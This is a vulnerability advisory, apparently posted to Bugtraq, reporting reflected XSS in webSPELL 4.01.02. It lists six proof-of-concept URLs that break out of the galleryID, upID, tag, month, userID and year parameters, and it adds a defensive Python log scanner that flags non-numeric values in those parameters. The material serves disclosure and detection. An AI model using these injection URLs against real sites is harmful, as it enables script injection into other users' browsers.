webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability

From: brainheadbrainhead@gmx.de
To: bugtraq@securityfocus.com
Cc:
Subject: webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
Date:


###################
Author: Brainhead
Type: XSS
Version: 4.01.02
Files: usergallery.php, calendar.php
Magic Quotes: off
###################
Examples:

http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[your code]
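
Added example, not part of the original advisory: a web-server log check that flags requests to the two affected pages in which any of the listed parameters carries a non-numeric value. It assumes these parameters are meant to be plain integers; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters listed in the advisory, grouped by the site/action pair they appear with.
WATCHED = {
    ("usergallery", "upload"): {"galleryID"},
    ("calendar", "announce"): {"upID", "tag", "month", "userID", "year"},
}
# Assumption: IDs and date parts are plain integers (an empty value is tolerated).
NUMERIC = re.compile(r"[0-9]{0,10}")
# Request line as it appears in a common/combined format access log.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def suspicious_params(request_target):
    """Return the watched parameters whose decoded value is not a plain integer."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    key = (query.get("site", [""])[-1], query.get("action", [""])[-1])
    hits = set()
    for name in WATCHED.get(key, ()):
        # parse_qs has already percent-decoded the values, so %22%3E is seen as ">.
        if any(not NUMERIC.fullmatch(value) for value in query.get(name, [])):
            hits.add(name)
    return sorted(hits)

def scan(lines):
    """Return (line_number, parameter_names) for each log line worth reviewing."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            params = suspicious_params(match.group(1))
            if params:
                findings.append((number, params))
    return findings

# Constructed sample lines: documentation IP addresses and a harmless MARKER string.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?site=calendar&action=announce&month=5&year=2024 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?site=calendar&action=announce&month=%22%3EMARKER&year=2024 HTTP/1.1" 200 5301',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?site=usergallery&action=upload&galleryID=%22%3EMARKER HTTP/1.1" 200 4410',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?site=news&tag=release HTTP/1.1" 200 3890',
]

if __name__ == "__main__":
    for number, params in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric value in {', '.join(params)}")
```

The same integer-only assumption is what a server-side fix would enforce before these values are written into the page.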




